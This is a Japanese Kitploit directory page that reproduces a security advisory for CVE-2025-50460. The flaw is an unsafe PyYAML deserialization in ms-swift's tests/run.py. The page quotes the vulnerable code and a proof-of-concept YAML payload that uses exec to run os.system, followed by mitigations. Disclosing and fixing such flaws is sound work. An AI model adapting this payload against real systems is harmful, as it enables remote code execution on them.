Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-50460 — CVE-2025-50460 の技術詳細とエクスプロイト | Kitploit
ツール/GitHubGitHub/anchor0221/cve-2025-50460
静的分析脆弱性分析コード分析エクスプロイト論文と研究学習と教育
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

CVE-2025-50460 の技術詳細とエクスプロイト

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-50460: 不安なPyYAMLデシリアライゼーションによるmodelscope/ms-swiftのリモートコード実行

ステータス: 分析待ち
このCVEレコードはNVDの強化努力のためにマークされています。

ms-swiftプロジェクトバージョン3.3.0には、tests/run.pyにおけるPyYAMLライブラリ(バージョン≦5.3.1)のyaml.load()を使用した安全でないデシリアライゼーションによるリモートコード実行(RCE)の脆弱性が存在します。攻撃者が--run_configパラメータに渡されるYAML設定ファイルの内容を制御できる場合、デシリアライゼーション中に任意のコードが実行される可能性があります。これにより、システム全体が侵害される可能性があります。悪意のあるYAMLファイルが読み込まれると脆弱性がトリガーされ、os.system()などの任意のPythonコマンドの実行が可能になります。緩和策として、PyYAMLをバージョン5.4以降にアップグレードし、yaml.safe_load()を使用することを推奨します。

説明

modelscope/ms-swiftプロジェクトには、脆弱なバージョンのPyYAMLライブラリ(≦5.3.1)と組み合わせたyaml.load()の安全でない使用によるリモートコード実行(RCE)の脆弱性が存在します。問題はtests/run.pyスクリプトにあり、ユーザー提供のYAML設定ファイルがyaml.load()とyaml.FullLoaderを使用してデシリアライズされます。

攻撃者が--run_config引数に提供されるYAML設定ファイルを制御または置き換えることができる場合、任意のコード実行につながる悪意のあるペイロードを注入する可能性があります。

影響を受けるリポジトリ

  • プロジェクト: modelscope/ms-swift
  • 影響を受けるバージョン: 最新
  • ファイル: tests/run.py
  • GitHub Permalink: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • 依存関係: PyYAML <= 5.3.1

脆弱なコード

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

概念実証(PoC)

ステップ1: 悪意のあるYAMLファイルを作成 (exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

ステップ2: 脆弱なPyYAML(<= 5.3.1)で実行

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

これによりos.systemが実行され、コード実行が証明されます。

緩和策

  • yaml.load()をyaml.safe_load()に置き換える
  • PyYAMLをバージョン5.4以降にアップグレードする

修正例:

root@kitploit:~
# Before
yaml.load(f, Loader=yaml.FullLoader)

# After
yaml.safe_load(f)

CVE ステータス

フィールド値
CVE IDCVE-2025-50460
CVSS スコアTBD
CWECWE-502: 信頼できないデータのデシリアライゼーション
報告日2025-04-25
開示日2025-07-30
影響を受けるバージョン最新
修正バージョン

著者

  • 発見者: Yu Rong (戎誉) と Hao Fan (凡浩)
  • 連絡先: [[email protected] ]
ツールをダウンロード